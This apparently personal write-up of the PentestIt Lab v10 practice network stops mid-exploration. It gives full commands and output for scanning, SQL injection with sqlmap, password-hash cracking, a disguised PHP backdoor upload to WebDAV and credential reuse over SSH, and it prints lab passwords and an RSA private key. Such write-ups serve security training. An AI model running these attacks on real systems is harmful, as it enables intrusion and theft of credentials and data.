PentestIt Lab v10

This time, I'm dealing with a network of hosts. Pentestit lab v10 to be exact. The network diagram looks pretty interesting.


After having connected to the vpn. I can only see the gateway to begin with. Let's start by checking out what kind of services are exposed.

[email protected]:~/Documents/pentestit# nmap -A -sV -p- -n -Pn -oA gwscan 192.168.101.9

Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-03 10:33 EET
Nmap scan report for 192.168.101.9
Host is up (0.064s latency).
Not shown: 65530 filtered ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.0p1 Debian 4+deb7u6 (protocol 2.0)
| ssh-hostkey: 
|   1024 bd:04:9b:d8:8d:0e:5b:e3:11:a7:57:18:c0:ce:9f:83 (DSA)
|   2048 98:e6:d0:35:6d:11:c4:d1:fb:7c:0f:87:c6:b6:8e:da (RSA)
|_  256 2c:58:fd:06:ea:46:8e:f7:b5:28:58:58:06:fa:dc:38 (ECDSA)
25/tcp   open  smtp    CommuniGate Pro mail server 6.0.9
|_smtp-commands: SMTP EHLO nmap.scanme.org: failed to receive data: connection timeout
80/tcp   open  http    nginx 1.10.1
|_http-server-header: nginx/1.10.1
|_http-title: 403 Forbidden
443/tcp  open  http    nginx 1.2.1
|_http-server-header: nginx/1.2.1
|_http-title: Security Blog by GlobalDataSecurity
8100/tcp open  http    CommuniGate Pro httpd 6.0.9
| http-methods: 
|_  Potentially risky methods: PUT DELETE LOCK UNLOCK MKCOL PROPFIND PROPPATCH MOVE COPY REPORT SEARCH ACL MKCALENDAR
|_http-server-header: CommuniGatePro/6.0.9
|_http-svn-info: ERROR: Script execution failed (use -d to debug)
|_http-title:  CommuniGate Pro gds.lab Entrance
| http-webdav-scan: 
|   Server Date: Fri, 03 Feb 2017 08:35:23 GMT
|   WebDAV type: Unkown
|   Public Options: OPTIONS, GET, HEAD, POST, PUT, DELETE, LOCK, UNLOCK, MKCOL, PROPFIND, PROPPATCH, MOVE, COPY, REPORT, SEARCH, ACL, MKCALENDAR
|   Allowed Methods: OPTIONS, GET, HEAD, POST, PUT, DELETE, LOCK, UNLOCK, MKCOL, PROPFIND, PROPPATCH, MOVE, COPY, REPORT, SEARCH, ACL, MKCALENDAR
|   Server Type: CommuniGatePro/6.0.9
|   Directory Listing: 
|     /
|     /CalDAV/
|     /CalDAV/INBOX/
|     /CalDAV/Outbox/
|     /WebDAV/private/caldav/
|_    /CalDAV/Notify/
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|firewall
Running (JUST GUESSING): Linux 3.X|2.6.X (91%), WatchGuard Fireware 11.X (91%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:watchguard:fireware:11.8 cpe:/o:linux:linux_kernel:2.6
Aggressive OS guesses: Linux 3.2 - 3.8 (91%), Linux 3.5 (91%), WatchGuard Fireware 11.8 (91%), Linux 3.2.0 (90%), Linux 3.8 (89%), Linux 3.1 - 3.2 (89%), Linux 2.6.32 - 2.6.39 (87%), Linux 2.6.18 - 2.6.22 (86%), Linux 3.0 - 3.2 (86%), Linux 2.6.32 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 3 hops
Service Info: Host: gds.lab; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 25/tcp)
HOP RTT      ADDRESS
1   65.49 ms 10.10.0.1
2   66.25 ms 172.0.1.1
3   66.00 ms 192.168.101.9

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 235.09 seconds

Looking good so far. Let's start looking around.  I check out that webserver first.


Ok that looks kind of wrong. Javascript and templates seem to not have loaded. However burps shows something interesting.


So we need a hostname for it to work properly. I added "store.gds.lab" point at 192.168.101.9 in my /etc/hosts and try again.


Now that's more like it. An eshop running opencart, I'll dig deeper here later.

Let's look around a bit more. So for the domain "gds.lab" we have subdomain "store" which is the name of one of the machines. Let's check if there is a dns server available.

[email protected]:~/Documents/pentestit# nmap -A -sU -p53 -n -Pn -oA gwscan 192.168.101.9

Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-03 10:51 EET
Nmap scan report for 192.168.101.9
Host is up (0.069s latency).
PORT   STATE SERVICE VERSION
53/udp open  domain  ISC BIND (Fake version: 9.8.4-rpz2+rl005.12-P1)
| dns-nsid: 
|_  bind.version: 9.8.4-rpz2+rl005.12-P1
Too many fingerprints match this host to give specific OS details

So the DNS server is there. I just add the names of the other machines in a text file called "names" and look for records of those with a for loop.

[email protected]:~/Documents/pentestit# cat names 
cloud
ssh
mail
dev-store
store
site
ssh-test
WIN-DC0
blog
web-control
hall-of-fame
captcha
news
WIN-TERM
[email protected]:~/Documents/pentestit# for line in $(< names)
> do
> host -t a $line.gds.lab 192.168.101.9
> done
Using domain server:
Name: 192.168.101.9
Address: 192.168.101.9#53
Aliases: 

cloud.gds.lab has address 192.168.101.9
Using domain server:
Name: 192.168.101.9
Address: 192.168.101.9#53
Aliases: 

Host ssh.gds.lab not found: 3(NXDOMAIN)
Using domain server:
Name: 192.168.101.9
Address: 192.168.101.9#53
Aliases: 

Host mail.gds.lab not found: 3(NXDOMAIN)
Using domain server:
Name: 192.168.101.9
Address: 192.168.101.9#53
Aliases: 

Host dev-store.gds.lab not found: 3(NXDOMAIN)
Using domain server:
Name: 192.168.101.9
Address: 192.168.101.9#53
Aliases: 

store.gds.lab has address 192.168.101.9
Using domain server:
Name: 192.168.101.9
Address: 192.168.101.9#53
Aliases: 

Host site.gds.lab not found: 3(NXDOMAIN)
Using domain server:
Name: 192.168.101.9
Address: 192.168.101.9#53
Aliases: 

Host ssh-test.gds.lab not found: 3(NXDOMAIN)
Using domain server:
Name: 192.168.101.9
Address: 192.168.101.9#53
Aliases: 

Host WIN-DC0.gds.lab not found: 3(NXDOMAIN)
Using domain server:
Name: 192.168.101.9
Address: 192.168.101.9#53
Aliases: 

Host blog.gds.lab not found: 3(NXDOMAIN)
Using domain server:
Name: 192.168.101.9
Address: 192.168.101.9#53
Aliases: 

Host web-control.gds.lab not found: 3(NXDOMAIN)
Using domain server:
Name: 192.168.101.9
Address: 192.168.101.9#53
Aliases: 

Host hall-of-fame.gds.lab not found: 3(NXDOMAIN)
Using domain server:
Name: 192.168.101.9
Address: 192.168.101.9#53
Aliases: 

Host captcha.gds.lab not found: 3(NXDOMAIN)
Using domain server:
Name: 192.168.101.9
Address: 192.168.101.9#53
Aliases: 

Host news.gds.lab not found: 3(NXDOMAIN)
Using domain server:
Name: 192.168.101.9
Address: 192.168.101.9#53
Aliases: 

Host WIN-TERM.gds.lab not found: 3(NXDOMAIN)

From the output of this loop I know that cloud.gds.lab is also valid.


A local owncloud installation. Leaving that for the time being. I move over at the other ports. We also have port 443 open. Although when trying to connect...


Ok that's odd. Burp is confused and thinks there is not SSL there. Taking another look at the nmap I notice something

443/tcp  open  http    nginx 1.2.1
|_http-server-header: nginx/1.2.1
|_http-title: Security Blog by GlobalDataSecurity

Indeed it's HTTP not HTTPS. Let's take another look, this time at http://192.168.101.9:443/


There it is. Moving on to other ports. 8100 is the CommuniGate Web UI. I'll probably need some mails to connect to that. Although that blog gives me 2 mails already on the contact page. Noting those down for later.


Other than that, I decide to enumerate users from that smtp port that is open as well. For that I'll be using metasploit's smtp_enum module.

msf > use auxiliary/scanner/smtp/smtp_enum 
msf auxiliary(smtp_enum) > show options

Module options (auxiliary/scanner/smtp/smtp_enum):

   Name       Current Setting                                                Required  Description
   ----       ---------------                                                --------  -----------
   Proxies                                                                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                                                    yes       The target address range or CIDR identifier
   RPORT      25                                                             yes       The target port (TCP)
   THREADS    1                                                              yes       The number of concurrent threads
   UNIXONLY   true                                                           yes       Skip Microsoft bannered servers when testing unix users
   USER_FILE  /usr/share/metasploit-framework/data/wordlists/unix_users.txt  yes       The file that contains a list of probable users accounts.

msf auxiliary(smtp_enum) > set RHOSTS 192.168.101.9
RHOSTS => 192.168.101.9
msf auxiliary(smtp_enum) > run

[*] 192.168.101.9:25      - 192.168.101.9:25 Banner: 220 gds.lab ESMTP CommuniGate Pro 6.0.9 is glad to see you!
[+] 192.168.101.9:25      - 192.168.101.9:25 Users found: postmaster
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

So using the default wordlist that comes with the module I was able to identify another email. [email protected] Wrapping it up, I have 3 mails so far.


Also, it looks like they are using their own Pronto version. Looking a bit closer to the app download links, the android app is located in a subdirectory called "gds.lab".

Grabbing a copy of that, it might be interesting later on.

[email protected]:~/Documents/pentestit# wget http://192.168.101.9:8100/SkinFiles/gds.lab/Viewpoint/pronto.apk
--2017-02-03 12:38:59--  http://192.168.101.9:8100/SkinFiles/gds.lab/Viewpoint/pronto.apk
Connecting to 192.168.101.9:8100... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2362437 (2.3M) [application/vnd.android.package-archive]
Saving to: ‘pronto.apk’

pronto.apk                100%[==================================>]   2.25M   127KB/s    in 8.5s    

2017-02-03 12:39:08 (271 KB/s) - ‘pronto.apk’ saved [2362437/2362437]

At this point, I leave intruder running on those mails. Using a medium size list of passwords (only using 1 thread in order not to stress the service).


While this is running, I take a closer look at the blog site since that's the one that's custom.

By throwing 1 quote and then 2 quotes on the id parameter of the posts I get the feeling of an injection, though some filtering might be in place. That's true until I try random cases.


The above query doesn't return anything when 2=1 so I'm dealing with a boolean blind sqli. Firing up Sqlmap for this case, and proxying it through Burp for better insight.

[email protected]:~/Documents/pentestit# sqlmap -u "http://192.168.101.9:443/post.php?id=1" --user-agent="Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" --risk=3 --level=5 -p id --tamper=randomcase -t B --proxy=http://127.0.0.1:8080
...
OUTPUT OMITTED
...
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 134 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1') AND 6973=6973-- uwZr

    Type: UNION query
    Title: Generic UNION query (random number) - 2 columns
    Payload: id=-7676') UNION ALL SELECT 8145,CONCAT(0x717a786a71,0x6f4e696e4a516a7159574a4476655147614a73554f4377734a79557845576b565159697a57666b41,0x7162787a71)-- TGyb
---
[16:38:29] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[16:38:29] [INFO] testing MySQL
[16:38:29] [INFO] confirming MySQL
[16:38:30] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.45, Nginx
back-end DBMS: MySQL >= 5.0.0
[16:38:30] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.101.9'

[*] shutting down at 16:38:30

Fine so far. Now let's start grabbing some data. At this point I'm not able to retrieve data with sqlmap and Burp proxy history comes to the rescue to show me why.

Because of the randomcase tamper script, there are cases, that certain strings don't actually get different case and that causes sqlmap to be confused. For example ORD might actually be changed to ORd but OR is still an SQL word and that messes up the data retrieval.

Through Burp and it's match & replace rules I make certain changes.


And now with these in place, I'm able to retrieve data.

[email protected]:~/Documents/pentestit# sqlmap -u "http://192.168.101.9:443/post.php?id=1" --user-agent="Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" -p id --tamper=randomcase -t B --proxy=http://127.0.0.1:8080 --dbs
...
OUTPUT OMITTED
...
available databases [2]:
[*] `information_schema`
[*] site

At this point, bruteforcing the mail has finished and nothing has come up.

Focusing on the sqli, by retriving --is-dba, --current-user and --current-db I know that the user I'm using is not privileged, and it's a simple "[email protected]" account. Also, the current databse is "site", so I'm dumping the contents to see what I can find.

Database "site" contained 2 tables, "posts" and "users". The first one well, doesn't contain anything interesting other than the content of the site. The second one however...

[email protected]:~/Documents/pentestit# sqlmap -u "http://192.168.101.9:443/post.php?id=1" --user-agent="Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" -p id --tamper=randomcase -t B --proxy=http://127.0.0.1:8080 -D site --dump
...
OUTPUT OMITTED
...
Database: site
Table: users
[1 entry]
+----+-----------+------------------------------------+
| id | username  | password                           |
+----+-----------+------------------------------------+
| 1  | e.lindsey | $1$w9aURG9k$Wf1VIpv9VET3v3VWZ4YD8. |
+----+-----------+------------------------------------+

Next step is, crackin this password. Feeding this into a file and then to john...

[email protected]:~/Documents/pentestit# john --wordlist:/usr/share/wordlists/rockyou.txt hash 
Warning: detected hash type "md5crypt", but the string is also recognized as "aix-smd5"
Use the "--format=aix-smd5" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ [MD5 128/128 AVX 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
lindsey123       (e.lindsey)
1g 0:00:00:02 DONE (2017-02-06 11:07) 0.4032g/s 32941p/s 32941c/s 32941C/s linny..lilolilo
Use the "--show" option to display all of the cracked passwords reliably
Session completed

That was easy. So e.lindsey's password is lindsey123. But for what?

First thing I try, is checking if there is some admin interface for this blog since well, I have some kind of credentials for it. Simply throwing /admin on the url is revealing.


That's the admin interface of the "site". Simply trying to log in with the former credentials reveals the first token for the "site" box.


After that, I try logging in the webmail on port 8100 with the account [email protected] and the password found. And I'm in.


From the "Compose" page I check out the user's address book and I'm able to grab some more emails. Some are on the same domain and some others aren't. The ones on the same domain are:

"Alfred Modlin" - [email protected]
"Emanuel Lindsey" - [email protected]
"none" - [email protected]
"Joshua Wise" - [email protected]
"Scott Locklear" - [email protected]

And the ones not on that domain are:

"Anna Byrns" - [email protected]
"Alex Fox" - [email protected]
"Amy Lock" - [email protected]
"B. Trokin" - [email protected]
"Dean Rivers" - [email protected]
"Emanuel Lindsey" - [email protected]
"E. Vasilyev" - [email protected]
"Harry Farris" - [email protected]
"Jerry Burris" - [email protected]
"Martin Ismail" - [email protected]
"Michael Minter" - [email protected]
"M. Sopov" - [email protected]
"Micheal Wessel" - [email protected]
"none" - [email protected]
"none" - [email protected]
"none" - [email protected]
"Raymond Black" - [email protected]
"Ron Dossett" - [email protected]
"Sara Ramos" - [email protected]
"Vivian Nix" - [email protected]
"Wm Moran" - [email protected]
"Wilfred Phillips" - [email protected]

Plus, 2 more domains other the the one already known "gds.lab". "mail.g-security.lab" and "s-lab.test". Both of which result in a refuse from the dns server when I ask for them externally.

[email protected]:~/Documents/pentestit# nslookup mail.g-security.lab 192.168.101.9
Server:  192.168.101.9
Address: 192.168.101.9#53

** server can't find mail.g-security.lab: REFUSED

[email protected]:~/Documents/pentestit# nslookup s-lab.test 192.168.101.9
Server:  192.168.101.9
Address: 192.168.101.9#53

** server can't find s-lab.test: REFUSED

With those credentials, I try to see if I can get any serverside execution by uploading files to the WebDAV but the server does not support execution even though I tried using the chexec functionality.

[email protected]:~/Documents/pentestit/scans# davtest -url http://192.168.101.9:8100/WebDAV/ -auth e.lindsey:lindsey123 --uploadfile ../simple-backdoor.php\;.png --uploadloc /test.php\;.png
********************************************************
 Testing DAV connection
OPEN  SUCCEED:  http://192.168.101.9:8100/WebDAV
********************************************************
 unless  Uploading file
Upload succeeded: http://192.168.101.9:8100/WebDAV//test.php;.png


Can't find anything else in Communigate web ui for the time being, with this user at least. Let's see however if these credentials are good anywhere else.

[email protected]:~/Documents/pentestit# ssh [email protected]
[email protected]'s password: 
Linux tl10-ssh 3.2.0-4-amd64 #1 SMP Debian 3.2.82-1 x86_64
Last login: Mon Feb  6 13:23:16 2017 from 10.10.37.34
[email protected]:~$

The credentials were good for ssh. Now it's time to enumerate this box. I'll just use LinEnum.sh.

[email protected]:/tmp$ ./.linenum.sh -t > .enumed.txt

[email protected]:~/Documents/pentestit# scp [email protected]:/tmp/.enumed.txt ./enumed.txt
[email protected]'s password: 
.enumed.txt                                               100%   30KB 195.6KB/s   00:00

From inside the /tmp folder since I don't have permissions to write in e.lindsey's directory, I run the script, dump the output in a file, and then just grab the file with the results with scp locally.

From the results, the IP of the box points to the fact that I am in the box called SSH (IP: 172.16.0.8) so I know where my foothold is.

 [00;31mNetwork & IP info: [00m
eth0      Link encap:Ethernet  HWaddr 08:00:27:a5:fa:cf  
          inet addr:172.16.0.8  Bcast:172.16.0.255  Mask:255.255.255.0
          inet6 addr: fe80::a00:27ff:fea5:facf/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:377921 errors:0 dropped:0 overruns:0 frame:0
          TX packets:448123 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:113776859 (108.5 MiB)  TX bytes:121521451 (115.8 MiB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:20 errors:0 dropped:0 overruns:0 frame:0
          TX packets:20 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:1476 (1.4 KiB)  TX bytes:1476 (1.4 KiB)

Also, an interesting thing is the listening ports ofthe machine.

Listening TCP:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -               
tcp        0      0 172.16.0.8:53           0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:53            0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:953           0.0.0.0:*               LISTEN      -               
tcp        0      0 172.16.0.8:22           10.10.178.222:56132     ESTABLISHED -               
tcp        0      0 172.16.0.8:22           10.10.37.34:39974       ESTABLISHED -               
tcp        0      0 172.16.0.8:22           10.10.143.66:60110      ESTABLISHED -               
tcp        0      0 172.16.0.8:22           10.10.112.246:58454     ESTABLISHED -               
tcp        0      0 172.16.0.8:22           10.10.224.130:59736     ESTABLISHED -               
tcp        0      1 172.16.0.8:49962        54.246.133.196:443      SYN_SENT    8195/python     
tcp        0      0 172.16.0.8:22           10.10.178.222:56202     ESTABLISHED -               
tcp        0      1 172.16.0.8:49946        54.246.133.196:443      SYN_SENT    8195/python     
tcp6       0      0 ::1:953                 :::*                    LISTEN      -           

From that, I can make out that there is a webserver running on the box. While browsing through the results, I also notice the following:

 [00;31mFiles not owned by user but writable by group: [00m
-rwxrwxrwx 1 root root 1192 Oct  6 15:51 /opt/upload/admin/config.php
-rwxrwxrwx 1 root root 1027 Oct  6 15:51 /opt/upload/config.php
-rwxrwxrwx 1 root root 1098 Oct 19 17:58 /var/www/admin/config.php
-rwxrwxrwx 1 root root 946 Oct 19 17:38 /var/www/config.php
-rwxrwxrwx 1 www-data adm 4297 Nov 27 06:12 /var/log/nginx/error.log.1

Some very interesting files are accessible. These files seem to be the config files of Opencart, including db credentials, local folder structure of the store etc. This could be some kind of local installation of the store only accessible from within the network for whatever purposes.

<?php
// HTTP
define('HTTP_SERVER', 'http://store.gds.lab/admin/');
define('HTTP_CATALOG', 'http://store.gds.lab/');

// HTTPS
define('HTTPS_SERVER', 'http://store.gds.lab/admin/');
define('HTTPS_CATALOG', 'http://store.gds.lab/');

// DIR
define('DIR_APPLICATION', '/var/www/admin/');
define('DIR_SYSTEM', '/var/www/system/');
define('DIR_IMAGE', '/var/www/image/');
define('DIR_LANGUAGE', '/var/www/admin/language/');
define('DIR_TEMPLATE', '/var/www/admin/view/template/');
define('DIR_CONFIG', '/var/www/system/config/');
define('DIR_CACHE', '/var/www/system/storage/cache/');
define('DIR_DOWNLOAD', '/var/www/system/storage/download/');
define('DIR_LOGS', '/var/www/system/storage/logs/');
define('DIR_MODIFICATION', '/var/www/system/storage/modification/');
define('DIR_UPLOAD', '/var/www/system/storage/upload/');
define('DIR_CATALOG', '/var/www/catalog/');

// DB
define('DB_DRIVER', 'mysqli');
define('DB_HOSTNAME', 'localhost');
define('DB_USERNAME', 'dbuser');
define('DB_PASSWORD', 'dfs8g^Ehsd');
define('DB_DATABASE', 'testlab');
define('DB_PORT', '3306');
define('DB_PREFIX', 'oc_');

Now having the database credentials for the application, I log into the database, and start looking for other credentials or anything useful.

[email protected]:/var/www$ mysql -u dbuser -h localhost -D testlab -p
Enter password: 
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 3
Server version: 5.5.53-0+deb7u1 (Debian)

Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> SELECT user_id,username,password,salt,firstname,lastname,email FROM oc_user;
+---------+----------+------------------------------------------+-----------+-----------------------+----------+-----------------------+
| user_id | username | password                                 | salt      | firstname             | lastname | email                 |
+---------+----------+------------------------------------------+-----------+-----------------------+----------+-----------------------+
|       1 | admin    | 652995927a552617aeed8ecf844b6f6af4760a15 | J3Wgm5mbC | John                  | Doe      | [email protected]     |
|       2 | admin2   | e2180c9ab794460fe1338bfc28b4e8015edb7777 | e9c180b5c | [email protected] |          | [email protected] |
+---------+----------+------------------------------------------+-----------+-----------------------+----------+-----------------------+

Next step putting these in a file, and feeding that file to john to see if it comes up with anything. Also I'll have to use a custom opencart format because opencart uses its own hashing function according to this.

[email protected]:~/Documents/pentestit# cat opencarthashes 
admin:652995927a552617aeed8ecf844b6f6af4760a15$J3Wgm5mbC
admin2:e2180c9ab794460fe1338bfc28b4e8015edb7777$e9c180b5c
[email protected]:~/Documents/pentestit# ../../Tools/JohnTheRipper/run/john -form=dynamic='sha1($s.sha1($s.sha1($p)))' opencarthashes --wordlist:/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (dynamic=sha1($s.sha1($s.sha1($p))) [128/128 AVX 4x1])
Press 'q' or Ctrl-C to abort, almost any other key for status
admin            (admin2)
1g 0:00:00:06 DONE (2017-02-06 18:03) 0.1610g/s 2309Kp/s 2313Kc/s 2313KC/s !(3([email protected] * 7¡Vamos! 
Use the "--show" option to display all of the cracked passwords reliably
Session completed

At this point I take a step back to look a bit at the box and its filesystem. While browsing, I find the following directory.

[email protected]:/tmp$ cd /data
[email protected]:/data$ ls
users
[email protected]:/data$ cd users
[email protected]:/data/users$ ls
ls: cannot open directory .: Permission denied
[email protected]:/data/users$

From the looks of it, I cannot access the directory, or more specifically I cannot see its contents. Time for a bit of bruteforce. Keeping in mind that the immediate folder is that of a user, and then some other folder, I write the following script to automate the process.

import os
from string import ascii_lowercase
from itertools import product

for X in range(1,5,1):
 keywords = [''.join(i) for i in product(ascii_lowercase, repeat = X)]
 users = ['a.modlin', 'e.lindsey', 'g.leone', 'k.barth', 'm.howard', 'rross', 's.locklear']

 for user in users:
  for word in keywords:
   if os.path.exists(os.path.join('/data/users', user, word)):
    print os.path.join('/data/users', user, word)

I run this little script and soon enough some valid directories start poping up.

[email protected]:/tmp/.test$ python dirfinder.py 
/data/users/a.modlin/tmp
/data/users/rross/tmp
/data/users/s.locklear/tmp
/data/users/a.modlin/docs
/data/users/rross/docs
/data/users/s.locklear/docs

Looking into these folders one by one. At some point I find the following.

e[email protected]:/tmp/.test$ cd /data/users/rross
[email protected]:/data/users/rross$ cd docs
[email protected]:/data/users/rross/docs$ ls -la
total 16
drwxr-xr-x 2 root root 4096 Nov 25 15:43 .
drwxr-x--x 4 root root 4096 Nov 25 15:15 ..
-rw----r-- 1 root root 1675 Nov 25 15:17 keys
-rw-r--r-- 1 root root    9 Nov 25 15:43 token.txt
[email protected]:/data/users/rross/docs$ cat token.txt 
miaM3aib
[email protected]:/data/users/rross/docs$ cat keys 
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEA5bsYzXHoflSg3IDa7BxzYphi+hVtAiL40Oj4WaMLG0gmLF2/
pnTwUTuUhrLty0w+D9Da77IEYs2BDe+/rZ2RGqRVk6c2emogsNPzBjGZDGLQ24dp
B62dSGRKubOz4SwIW/Urp7F/is0YJuqT57drNr4QgbaV5J3BZhLTXj8Vhja4GKAM
lhinuP1M57Khu6AxoOWn3BwATexSVRTUtWnS4UMH5eQImUoSOkCculZzjm4eVtN+
TK1MU3rJK0gi6vO6rewqQIIR4HFqJp9NQy8DVAGAEMx5VaXE3aMbdJ6J8QRDbwtu
oLi/jgloQmEzSXEkF1juHTVc7oAAlgiLmP5AYQIDAQABAoIBAFu/03IJsi7yIaSv
Gb/+xN51ueHjOLwHt5PH15gFE+R7djN15ZrXTTtELld1kp8E/ixW33mngTTsmkQ0
ojr2mQMo6ryjpZBSXmgA3ih1Gojl1kA23m2gmxZUZ7uu14JwkY4YZqz8qNGIg8LX
IOcETB963SDRCSBbGOhpUF1tmG0XH8scSyk/CWwqD1Bo5JTOBTBxw0rkPtGUm2u+
UxqLscdoDbMpYncyj050yxY29vThNtkwzLBR8nDY0NdYh6ADAF7xUfBMrMN3Yucm
F2NH1XwVM6qX9Kn4vjJIWssEKddU3Kb/wrl8/ZhFtBX0UnV1y3Ca8sVrRywSb/0b
XMqhwPkCgYEA9Qi2hpSDbIKHXfbLa7VvFUdssLbGYkvuXyxZ/c/H8t91ZQjM99DQ
E+P+fvLrnGylZ8rFRZhbshpU8wLvau2WpNPC6+1KyY4NdhDH5s4IXGxurtYrc0a2
rwFY6QUyWm2ZPA0tpF1jGIr2UXhl2eUAK+9vLB6UX8BdlhL+V6QQnHcCgYEA8AMP
PDSd3vMOon2RMJvPouhl+U+NbcBjgLi0RzDChRMs6K+ZaCN8VgBN9Jel3X2uiubS
6ZtQJb81liawoz/TvbWGj/Bdv9cw+Qx2NsXodXRFnGVLzUq4J8TKjGJ7sHyQkTuZ
qRMeV3uKXvRPB1+gb6IM+XKWnZwNwjXHV9UYt+cCgYEA3y8heXFaR4KYo7h/zkpC
tKIK2OaRycSZiOyPx0PzPj/U4MLkVrBGZmebTawbeK3o9qHVjy9YDeA4EeRRiBaB
yP3spBHNtcoCbtCYE50ENpK5OdxvVR9KlBppDk2icIU1NmJWeUhqU1d3Rfug4ZfY
0SvUGd58jL5dP61rJw6T5r8CgYAfJbZ/cLCgM1jN24/RCBdtI83ACgPnn1UKam3y
4zALRw7H76nv6tMC8i0rtdZvpRTWr9flOyOukl7o6oJ33Rukff9FhMMV115io6xf
tVVSkNFL15V7wdueRZqnl0xH/hJg1qQ9Xd7NKZoucnQjF9ThR915LdbAA3WBo6sI
Cf6YNwKBgAEicsYcWJmP31LMGpSkkayG4pQweRaB6900uLWuW+7erfmsXH3uhVBs
UlxuCP4KXPH0yyoWCx8NwXlieJ4yvDpaAbpc2dWsnEXsAfCvE/6ahXkQs3zEtFLP
6uOrc07P/Fg7x3Tfp1yUK51AkqPk/k7drRHlDKj6UZJt3yduhtKD
-----END RSA PRIVATE KEY-----

Another token - "ssh" box down! And a private key. Grabbing a copy of that too locally. So I know have a private ssh key for rross (probably) I'm thinking about focusing on the "ssh-test" box.

I start by nmaping that host from the box that I'm already in.

[email protected]:/tmp/.test$ nmap -A -sV -v -Pn -p- -n -oA ssh-test 172.16.0.1

Starting Nmap 6.00 ( http://nmap.org ) at 2017-02-07 18:16 MSK
NSE: Loaded 93 scripts for scanning.
NSE: Script Pre-scanning.
Initiating Connect Scan at 18:16
Scanning 172.16.0.1 [65535 ports]
Discovered open port 1392/tcp on 172.16.0.1
Completed Connect Scan at 18:16, 4.09s elapsed (65535 total ports)
Initiating Service scan at 18:16
Scanning 1 service on 172.16.0.1
Completed Service scan at 18:16, 0.01s elapsed (1 service on 1 host)
NSE: Script scanning 172.16.0.1.
Initiating NSE at 18:16
Completed NSE at 18:16, 0.03s elapsed
Nmap scan report for 172.16.0.1
Host is up (0.0013s latency).
Not shown: 65534 closed ports
PORT     STATE SERVICE VERSION
1392/tcp open  ssh     OpenSSH 6.0p1 Debian 4+deb7u6 (protocol 2.0)
| ssh-hostkey: 1024 bd:04:9b:d8:8d:0e:5b:e3:11:a7:57:18:c0:ce:9f:83 (DSA)
|_2048 98:e6:d0:35:6d:11:c4:d1:fb:7c:0f:87:c6:b6:8e:da (RSA)
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel

NSE: Script Post-scanning.
Initiating NSE at 18:16
Completed NSE at 18:16, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 4.50 seconds

Although I can't seem to connect via SSH. I decide to check with netcat.

[email protected]:/tmp/.test$ nc -nvv 172.16.0.1 1392
(UNKNOWN) [172.16.0.1] 1392 (?) : Connection refused
 sent 0, rcvd 0

Running nmap again.

[email protected]:/tmp/.test$ nmap -A -sV -Pn -p- -n -oA ssh-test 172.16.0.1

Starting Nmap 6.00 ( http://nmap.org ) at 2017-02-07 18:32 MSK
Nmap scan report for 172.16.0.1
Host is up (0.00034s latency).
Not shown: 65534 closed ports
PORT      STATE SERVICE VERSION
35084/tcp open  ssh     OpenSSH 6.0p1 Debian 4+deb7u6 (protocol 2.0)
| ssh-hostkey: 1024 bd:04:9b:d8:8d:0e:5b:e3:11:a7:57:18:c0:ce:9f:83 (DSA)
|_2048 98:e6:d0:35:6d:11:c4:d1:fb:7c:0f:87:c6:b6:8e:da (RSA)
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.09 seconds

That's odd... Running another nmap

